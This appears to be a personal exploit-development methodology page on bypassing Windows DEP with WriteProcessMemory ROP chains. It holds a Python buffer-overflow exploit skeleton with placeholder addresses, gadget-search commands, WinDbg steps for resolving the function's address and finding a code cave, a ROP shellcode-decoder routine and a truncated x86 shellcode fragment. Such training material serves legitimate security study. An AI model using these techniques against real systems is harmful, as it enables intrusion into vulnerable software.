
DEP Bypass using WPM Methodology

Reverse engineering Exploit development Penetration testing DEP Bypass ROP Chains

The following outlines my methodology for bypassing DEP with WriteProcessMemory. It leaves some blanks that can be filled in as you work through exercises and exploitation.

1. Program Analysis

| Description | Analysis |
| --- | --- |
| Ports | |
| Protections | |
| Input Type | |
| Base Address | |

2. Vuln Discovery

3.1 Vanilla Stack Overflow

| Description | Analysis |
| --- | --- |
| Offset to overwrite EIP | |
| Bad Chars | |
| Space After Overwrite | |
| DEP | |
| ASLR | |
| Codecave | |

3.2 SEH Based Overflow

| Description | Analysis |
| --- | --- |
| Offset to overwrite SEH | |
| Modules with SAFESEH | |
| Address to P/P/R | |
| Short jump on nSEH: 0x06eb9090 | |
| Bad Chars | |
| Space after SEH | |
| DEP | |
| ASLR | |

4. WriteProcessMemory Recap

This function will allow you to copy your shellcode to another (executable) location so you can jump to it and execute it. During the copy, WPM() makes sure the destination is marked as writeable, so you only have to make sure the destination is executable. The call needs six values on the stack (a return address followed by the five arguments):

- return address: address where WriteProcessMemory() needs to return to after it has finished
- hProcess: the handle of the current process. Should be -1 to point to the current process (static value 0xFFFFFFFF)
- lpBaseAddress: pointer to the location where your shellcode needs to be written to. The “return address” and “lpBaseAddress” will be the same.
- lpBuffer: base address of your shellcode (dynamically generated, address on the stack)
- nSize: number of bytes that need to be copied to the destination location
- lpNumberOfBytesWritten: writeable location where the number of bytes written will be stored
    # BOOL WriteProcessMemory(
    #   HANDLE  hProcess,
    #   LPVOID  lpBaseAddress,
    #   LPCVOID lpBuffer,
    #   SIZE_T  nSize,
    #   SIZE_T  *lpNumberOfBytesWritten
    # );

    va  = pack("<L", (0x41414141))  # WriteProcessMemory address
    va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
    va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
    va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
    va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
    va += pack("<L", (0x46464646))  # nSize (size of shellcode)
    va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)
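To keep the seven dwords in the right order while the dummies are gradually replaced, the skeleton can be built by a small helper. This is only a minimal sketch: the function name `build_wpm_skeleton` and its keyword names are illustrative and not part of the original template, and the defaults are the same dummy placeholders used above.

```python
from struct import pack, unpack

def build_wpm_skeleton(wpm=0x41414141, ret=0x42424242, h_process=0xFFFFFFFF,
                       base=0x44444444, buf=0x45454545, size=0x46464646,
                       written=0x47474747):
    """Pack the WriteProcessMemory call frame as seven little-endian dwords.

    Order: function address, return address, then the five arguments.
    All names here are hypothetical helpers for illustration.
    """
    fields = (wpm, ret, h_process, base, buf, size, written)
    return b"".join(pack("<L", f) for f in fields)

va = build_wpm_skeleton()
print("VA size", len(va))                       # 7 dwords
print([hex(x) for x in unpack("<7L", va)])      # dummies in stack order
```

Because every slot has a name, it is harder to swap two dummies by accident when patching them in later steps.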

5. Payload Update and Gadget Searching

We update our payload to incorporate our ROP gadgets and buffer that we will be using. We update our payload as follows:


## Bad chars: 
## EIP Overwrite Address:
## DLLBase Address: 
## EIP Overwrite Size:

 
###################
## WPM STRUCTURE ##
###################
# BOOL WriteProcessMemory(
#   HANDLE  hProcess,
#   LPVOID  lpBaseAddress,
#   LPCVOID lpBuffer,
#   SIZE_T  nSize,
#   SIZE_T  *lpNumberOfBytesWritten
# );
   
va  = pack("<L", (0x41414141))  # WriteProcessMemory address
va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
va += pack("<L", (0x46464646))  # nSize (size of shellcode)
va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)

###################
##    OVERFLOW   ##
###################
# Offset until EIP overflow
offset = b"A" * (0 - len(va))

###################
## EIP Overwrite ##
###################
# We control the EIP overwrite
eip = pack("<L", (0x90909090)) #  DESCRIPTION

###################
##  ROP Gadgets  ##
###################
rop = pack("<L", (0x90909090)) #  DESCRIPTION
rop += pack("<L", (0x90909090)) #  DESCRIPTION

#####################
## NOP & Shellcode ##
#####################
# NOP Padding before shellcode, adjust as needed
rop += b"\x90" * (000 - len(offset) - len(eip))

#Shellcode placeholder at around 450 bytes size
shellc = b"\xCC" * 450

inputbuffer = offset + va + eip + rop + shellc

print("Sending evil buffer...")
print("Shellcode size " + str(len(shellc)))
print("Offset size " + str(len(offset)))
print("VA size " + str(len(va)))
print("Offset to EIP " + str(len(offset) + len(va)))
print("ROP size " + str(len(rop)))

We will now use rp++ and a custom-built PowerShell script to generate and sort gadgets that we can utilise.

.\rp-win-x86.exe -f C:\Users\initroot\xxxx -r 3 > gadgets.txt

gci .\gadgets  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(mov e[a-z][a-z], esp).*?((retn  ;)|(ret  ;))"  | Select-String -Pattern "(leave)" -NotMatch

We also use the PowerShell gci cmdlet to manually sort and filter our gadgets. For now we build a quick table of gadgets for simple operations, such as copying values between registers.
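The same filtering can be done in Python, which also makes it easy to drop gadgets whose addresses contain bad characters. The sketch below is not the custom script mentioned above; it assumes rp++ output lines of the form `0xADDRESS: instr ; instr ; ret  ;  (1 found)`, and the helper names and sample addresses are made up for illustration.

```python
import re
from struct import pack

def parse_line(line):
    """Split an (assumed) rp++ output line into (address, instructions)."""
    addr, sep, rest = line.strip().partition(": ")
    if not sep or not addr.startswith("0x"):
        return None
    instrs = re.sub(r"\s*\(\d+ found\)\s*$", "", rest)
    return int(addr, 16), instrs

def has_bad_chars(addr, badchars):
    """True if any byte of the little-endian address is a bad char."""
    return any(b in badchars for b in pack("<L", addr))

def find_gadgets(lines, pattern, badchars=b"\x00"):
    """Keep gadgets matching the pattern, without 'leave' and without bad bytes."""
    rx = re.compile(pattern)
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        addr, instrs = parsed
        if rx.search(instrs) and "leave" not in instrs \
                and not has_bad_chars(addr, badchars):
            hits.append((addr, instrs))
    return hits

# Made-up sample lines standing in for gadgets.txt
sample = [
    "0x1012a4b3: mov eax, esp ; ret  ;  (1 found)",
    "0x1012b0c1: mov ebx, esp ; leave  ; ret  ;  (1 found)",
    "0x10120056: mov ecx, esp ; ret  ;  (1 found)",   # address contains 0x00
    "0x1013c2d4: pop eax ; ret  ;  (1 found)",
]
hits = find_gadgets(sample, r"mov e[a-z][a-z], esp.*?retn?\s*;")
for addr, instrs in hits:
    print(hex(addr), instrs)
```

Only the first sample line survives: the second contains `leave`, the third has a NULL byte in its address, and the fourth does not match the pattern.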

We analyse our ROP gadgets to setup backup and restore gadgets that can be used during the exploit process.

| Gadget Location | From | To | Gadget Instructions |
| --- | --- | --- | --- |
| | | | |
| | | | |
| | | | |
| | | | |

6. Stack Prep

We need to find the stack address of our dummy values, which we can derive from the value in ESP. We can’t modify ESP itself because it points to the next gadget, but we can copy it to another register. Gadgets of the following forms can be used to obtain a copy of ESP. It is important that each gadget ends in a ret that carries us to the next value in the ROP chain, otherwise execution will not continue.

mov XXX, XXX; ret
xchg XXX, XXX; ret
pop XXX; mov XXX, XXX; ret
lea XXX, [XXX]; ret

To find gadgets we rely on a mix of our sorted ROP gadget output file and manual searches using the gci command pointed at our ROPS folder. In the example below, we look for PUSH ESP gadgets. As a reminder, our bad chars are: XXXXX.


We update our payload as follows:


The above will do the following:

Now we need to resolve our WriteProcessMemory address dynamically.

7. Resolving WPM Address

We need to obtain the location of WriteProcessMemory from the Import Address Table (IAT). The IAT is a crucial part of the Windows Portable Executable (PE) format and is used to manage dynamic linking of libraries. When a program calls a function from a dynamically linked library, it references the function’s entry in the IAT.

Since we cannot copy the executable, we will use WinDbg to obtain the address.

  1. List the loaded modules and note their base addresses with lm.

        
    
  2. Dump the header of the DLL you're interested in with !dh <module> -f.

        
    
  3. In the !dh output, look for the “Import Address Table Directory”.

        
    
  4. Use the d command to dump the memory at that offset and resolve the entries to symbols, e.g. dps 00000000+X000

        
    

From the above we can identify that our WriteProcessMemoryStub is located at: XXXXXX. Now we need to do the following.

dds XXXXXX

We update our payload and check that our dummy addresses are pushed correctly before we proceed.


As we are pushing 0x45454545 onto the stack as a dummy value, we want to identify where on the stack our dummy address is as shown below. We step through the instructions until the very last chain event and then calculate the offset.


? eax - XXXXX  

dd XXXXX  

From the above we learn that we need to move back 0xXX bytes from ESP (i.e. ESP - 0xXX) to reach our WriteProcessMemory dummy address. Since we have a copy of the original ESP in the EAX register, we can adjust that copy backwards instead of touching ESP itself. We ideally need gadgets like:

SUB EAX, XXXXXX
RETN

Since we can’t find the gadget, we have reached a pitfall and need to get a bit more creative.

gci .\gadgets  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(sub eax).*?((retn  ;)|(ret  ;))"
###no results###
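One common workaround when no usable `sub` gadget exists is to load the two's complement of the offset and add it instead, since adding -N equals subtracting N in 32-bit arithmetic. The original does not say which route was taken, so treat this as a sketch of the arithmetic only: the 0x1C offset and the EAX value are arbitrary examples, and whether suitable pop and add gadgets exist depends on the target module.

```python
from struct import pack

def neg32(n):
    """Two's complement negation, truncated to 32 bits."""
    return (-n) & 0xFFFFFFFF

offset = 0x1C                 # arbitrary example distance, not from a real target
neg = neg32(offset)

# The small positive offset packs with NULL bytes, the negated one does not
print(pack("<L", offset))
print(pack("<L", neg))

# Adding the negated value wraps around to the same result as subtracting
eax = 0x0012FF40              # hypothetical stack address held in EAX
adjusted = (eax + neg) & 0xFFFFFFFF
print(hex(adjusted))
```

A side benefit is that the negated constant usually avoids the NULL bytes that a small positive offset would introduce into the chain.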

Excellent, XXX register points to our WPM prototype and our first address resolves the WPM memory location successfully. We have successfully patched the address of WriteProcessMemory at runtime. Before we proceed further we ensure we make a copy of our ESP into another register.

8. Patching WPM Parameters

Codecave Hunting

Let’s recap our overall exploit structure, we will need to copy our shellcode to the codecave.

[offset] -> [writeprocessmemory] -> [eip] -> [rop] -> [shellcode]

We now need to patch in the address that WriteProcessMemory() returns to after it has finished. Before we can proceed, we need to identify the codecave that we will copy our shellcode to. The requirement is a memory location with Execute permissions. We first check the location where our shellcode currently resides. We will also need to resolve the address dynamically, and can potentially use a pivot to jump to our shellcode.


0:004> !dh processname

SECTION HEADER #1
   .text name
    1E39 virtual size
    1000 virtual address
    2000 size of raw data

0:004> dd processname + virtualSize + virtualAddress

0:004> !vprot address
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Perfect, it seems we have found a spot for our shellcode in the .text section with EXECUTE permissions. Further calculations show we have around XXX bytes for our shellcode. We therefore proceed with our shellcode location as XXXX.
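The "further calculations" can be reproduced offline. The sketch below uses the virtual size (0x1E39) and virtual address (0x1000) from the !dh output above; the module base of 0x00400000 and the assumption that the section is padded up to a 0x1000 page boundary are illustrative and should be confirmed in the debugger.

```python
PAGE = 0x1000

def code_cave(base, virtual_address, virtual_size, alignment=PAGE):
    """Return (start, free_bytes) of the padding after a section's used data.

    Assumes the section is padded up to the next alignment boundary.
    """
    start = base + virtual_address + virtual_size
    end = (start + alignment - 1) & ~(alignment - 1)   # round up to boundary
    return start, end - start

# base is a made-up example; 0x1000 and 0x1E39 come from the !dh output
start, free = code_cave(0x00400000, 0x1000, 0x1E39)
print(hex(start), hex(free), free)
```

With these inputs the unused tail starts at base + 0x2E39 and leaves 0x1C7 (455) bytes before the next page. Remember to check the resulting address for bad chars as well.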

Shellcode Return Address

Now that we have our shellcode location, we can proceed in writing the location into the dummy address. We update our WPM as follows:

va  = pack("<L", (0x41414141))  # WriteProcessMemory address
va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
va += pack("<L", (0x46464646))  # nSize (size of shellcode)
va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)

hProcess

We don’t have to do much for hProcess: the parameter should point to the current process, which in our case is 0xFFFFFFFF, a value we have already hardcoded. According to Microsoft Docs, [GetCurrentProcess()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess) returns a handle to the current process. More specifically, it returns a “pseudo handle”. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is a “special” constant that refers to the current process. This means that whenever a Windows API function requests a process handle (generally in user mode), passing 0xFFFFFFFF tells the API in question to use the current process. Since we want to write our shellcode to memory within our own process space, passing 0xFFFFFFFF to kernel32!WriteProcessMemory tells the function to write to virtual memory within the current process.
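As a quick check that -1 and 0xFFFFFFFF are the same 32-bit pattern, the two can be packed and compared. This is only an illustration of the arithmetic; the variable names are arbitrary.

```python
from struct import pack

signed = pack("<l", -1)              # -1 as a signed 32-bit integer
unsigned = pack("<L", 0xFFFFFFFF)    # the same bits as an unsigned value
h_process = -1 & 0xFFFFFFFF          # masking -1 to 32 bits

print(signed, unsigned, hex(h_process))
```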

# WriteProcessMemory
va  = pack("<L", (0x45454545)) # dummy WriteProcessMemory address
va += pack("<L", (0x42424242)) # shellcode return address 0x42424242, where our codecave in the .text area exists
va += pack("<L", (0xFFFFFFFF)) # hProcess = handle to current process (pseudo handle 0xFFFFFFFF points to current process)
va += pack("<L", (0x44444444)) # lpBaseAddress: code cave address 0x44444444, where our codecave in the .text area exists
va += pack("<L", (0x49494949)) # dummy lpBuffer (stack address)
va += pack("<L", (0x51515151)) # dummy nSize
va += pack("<L", (0x41414141)) # lpNumberOfBytesWritten

lpBaseAddress

The lpBaseAddress should be equal to our shellcode destination, i.e. the codecave. We update our WPM structure as follows, replacing 0x44444444 with 0xXXXXXXXX.

# WriteProcessMemory
va  = pack("<L", (0x45454545)) # dummy WriteProcessMemory address
va += pack("<L", (0x42424242)) # shellcode return address 0x42424242, where our codecave in the .text area exists
va += pack("<L", (0xFFFFFFFF)) # hProcess = handle to current process (pseudo handle 0xFFFFFFFF points to current process)
va += pack("<L", (0x44444444)) # lpBaseAddress: code cave address 0x44444444, where our codecave in the .text area exists
va += pack("<L", (0x49494949)) # dummy lpBuffer (stack address)
va += pack("<L", (0x51515151)) # dummy nSize
va += pack("<L", (0x41414141)) # lpNumberOfBytesWritten

lpBuffer

The lpBuffer will be a pointer to our shellcode (which first needs to be written to the stack). We will resolve this dynamically with ROP gadgets. Let’s dive in. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else.

Since we have control of the stack, we will just preemptively place our shellcode there. Let’s recap which values we have in the registers.


We need to write the stack address of our shellcode into the lpBuffer slot by using an arbitrary write primitive. Once the address of the lpBuffer slot is in a register, we do not overwrite the register itself. Instead we write through it with something like dword ptr [reg], which replaces the 0x49494949 dummy on the stack with the real address. Remember that every time the process is terminated and restarted, the virtual memory addresses on the stack change. This is why we need to resolve this parameter dynamically instead of hardcoding an address.


We see that everything works as expected and we successfully have our lpBuffer written.

nSize

Next up we have the nSize value. The value should be the number of bytes to copy, which in most instances is the size of the shellcode plus NOPs. Here we would like to copy at least 0x180 bytes (384 decimal). We continue our ROP chain by increasing the X register until it lines up with the nSize slot of the WriteProcessMemory skeleton.


lpNumberOfBytesWritten

We don’t need this value, so we simply zero it out. lpNumberOfBytesWritten is an optional argument that can be set to NULL. You could provide a pointer to a variable that will receive the number of bytes transferred by WPM, but this is not needed here.


Perfect we have successfully written all the parameters for WPM, and next we need to call kernel32!WriteProcessMemory.

9. Executing WPM

We should now execute our WPM as the stack has been successfully setup. By now we should be 0x20 bytes away from our WPM Prototype’s first parameter which points to kernel32!WriteProcessMemory. We search for gadgets that will decrease the registers we control.


We adjust our exploit as follows:


A final check before we attempt to execute WPM is to check if our lpBuffer is correctly sized still given the changes in our ROP exploit. We check that our WPM is invoked and that the parameters are setup correctly. We set a breakpoint and once WPM is started we check ESP.

0:004> p
KERNEL32!WriteProcessMemoryStub:
XXXXXXXX 8bff            mov     edi,edi
0:004> dds esp 

Next we check if the shellcode is copied, so we dump the contents of our codecave before and after execution.

u XXXXXX

Our parameters seem to have been set correctly, so we continue execution to confirm that our shellcode is copied. Keep in mind that our shellcode is currently represented by the 0xcc instructions. The following checks are performed:

If we experience issues with the shellcode being mangled, this is usually due to the space between WPM (VA) and our shellcode.

10. Shellcode Execution with WPM

Because the value needs to be popped into BH, it must be left-shifted by 8 bits. The shifted value lines up with the BH sub-register but leaves NULL bytes in the rest of the dword. To counteract the NULL bytes, we OR it with the static value 0x11110011. The result is written into the ROP chain, where it will be popped into a register during execution.
This procedure gives us custom encoding, and it lets us decode the shellcode on the stack before it is copied to the non-writable code cave.

```python
from struct import pack

# The OR mask fills the unused bytes so the packed dword contains no NULLs:
# AL: value = value | 0x11111100
# BH: value = (value << 8) | 0x11110011

def decodeShellcode(badIndex, shellcode):
    badchars = bytearray(b"\x00\x20")
    addencodedchars = bytearray(b"\x01\x01")  # amount added at runtime to restore each bad char
    restoreRop = b""
    for i in range(len(badIndex)):
        # Distance from the previously patched byte (or from the start for the first one)
        if i == 0:
            offset = badIndex[i]
        else:
            offset = badIndex[i] - badIndex[i-1]
        neg_offset = (-offset) & 0xffffffff

        value = None
        for j in range(len(badchars)):
            if shellcode[badIndex[i]] == badchars[j]:
                value = addencodedchars[j]
                value = (value << 8) | 0x11110011
        if value is None:
            raise ValueError("index %d does not hold a known bad char" % badIndex[i])

        restoreRop += pack("<L", (0xFFFFFFFF)) # POP VALUE
        restoreRop += pack("<L", (neg_offset)) # offset to the next bad char
        restoreRop += pack("<L", (0xFFFFFFFF)) # SUB OFFSET
        restoreRop += pack("<L", (0xFFFFFFFF)) # POP VALUE
        restoreRop += pack("<L", (value)) # value to add, masked to avoid NULL bytes
        restoreRop += pack("<L", (0xFFFFFFFF)) # add byte [ecx], al ; ret ;

    return restoreRop
```

Since decoding the shellcode requires a pointer to it on the stack, the best place to insert the decoding routine is right after the `lpBuffer` argument has been patched. As our ROP chain changes, we will need to keep adjusting the shellcode offset set during the `lpBuffer` step to ensure we still land within our NOP sled.

```python
[....]

########### ROP ENCODER ###########
## Bad chars:  \x00\x0d\x20\x2b\x3d\x5e
shellc = b"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe"

pos = mapBadChars(shellc)
rop += decodeShellcode(pos, shellc)

#Restore WPM prototype buffer for nSize patching

## NSIZE
#adjust eax to align with nsize e.g. increase eax 0x04
rop += pack("<L", (0xFFFFFFFF)) # inc eax ; ret  ; 
rop += pack("<L", (0xFFFFFFFF)) # inc eax ; ret  ;
[....]

#####################
## NOP & Shellcode ##
#####################
# NOP Padding before shellcode, adjust as needed
encodedShellcode = encode(shellc)
[....]
```
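The snippet above calls `mapBadChars` and `encode` without defining them. A minimal sketch of what they might look like follows. It assumes the same two bad chars as `decodeShellcode` (0x00 and 0x20) and that each is replaced by the byte one lower, so that adding 0x01 at runtime restores it; the replacement table is an assumption, not taken from the original.

```python
BADCHARS = b"\x00\x20"
REPLACEMENTS = b"\xff\x1f"   # assumed: (bad char - 0x01) & 0xff for each entry

def mapBadChars(shellcode, badchars=BADCHARS):
    """Return the index of every bad char in the shellcode."""
    return [i for i, b in enumerate(shellcode) if b in badchars]

def encode(shellcode, badchars=BADCHARS, replacements=REPLACEMENTS):
    """Swap each bad char for its replacement and leave other bytes alone."""
    table = dict(zip(badchars, replacements))
    return bytes(table.get(b, b) for b in shellcode)

# Tiny stand-in for real shellcode
sample = b"\x90\x00\x41\x20\xcc"
pos = mapBadChars(sample)
encoded = encode(sample)
print(pos, encoded)
```

The replacement bytes must not be bad chars themselves, which is worth checking whenever the bad char list grows.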

Before we identify potential ROP gadgets for the decoding process, we recap our register values at the point where our ROP decoder is set to start.

```python

```

| Register | Value | Description |
| --- | --- | --- |
| EAX |  |  |
| EBX |  |  |
| ECX |  |  |
| EDX |  |  |
| ESI |  |  |
| EDI |  |  |
| EBP |  |  |

We effectively need to do the following now:

- XXX points to our shellcode location
- pop the offset of our current or next bad char into a register
- subtract the negative offset
- pop the value for our OR instruction into register
- add lower sub register to our bad char
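The steps above can be simulated offline to sanity-check the offsets before any gadgets are chosen. The sketch below models the pointer register as an index into a bytearray and mirrors the offset arithmetic used in `decodeShellcode`. The function name and the sample bytes are illustrative, and it assumes every bad char is restored by adding 0x01.

```python
def simulate_decoder(encoded, bad_index, add_value=0x01):
    """Replay the decode steps on a copy of the encoded buffer."""
    buf = bytearray(encoded)
    ptr = 0                                   # pointer to the shellcode start
    for i, idx in enumerate(bad_index):
        # Relative distance from the previously patched byte
        offset = idx if i == 0 else idx - bad_index[i - 1]
        neg_offset = (-offset) & 0xFFFFFFFF   # value popped from the chain
        # Subtracting the negative offset moves the pointer forward
        ptr = (ptr - neg_offset) & 0xFFFFFFFF
        # Byte-sized add, wrapping at 0xFF like an 8-bit add would
        buf[ptr] = (buf[ptr] + add_value) & 0xFF
    return bytes(buf)

decoded = simulate_decoder(b"\x90\xff\x41\x1f\xcc", [1, 3])
print(decoded)
```

If the simulated output matches the original shellcode, the index list and offsets are consistent; any mismatch points at the offset bookkeeping rather than at the gadgets.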

```python

```

```powershell

gci .\rops\  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(add byte).*?((retn  ;)|(ret  ;))"

gci .\rops\  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(sub).*?((retn  ;)|(ret  ;))"

```

We update our shellcode as shown below. Next we step through the instructions to see if our encoder works.

```python
	  
```

Next we need to restore our registers once our ROP decoder is completed. The address for WPM is currently within `ESI`.

```python

```

We run our payload. Next we need to adjust our `lpBuffer` again by searching for our NOP sled and then calculating the difference.

```bash

```
© 2023 Frans Botes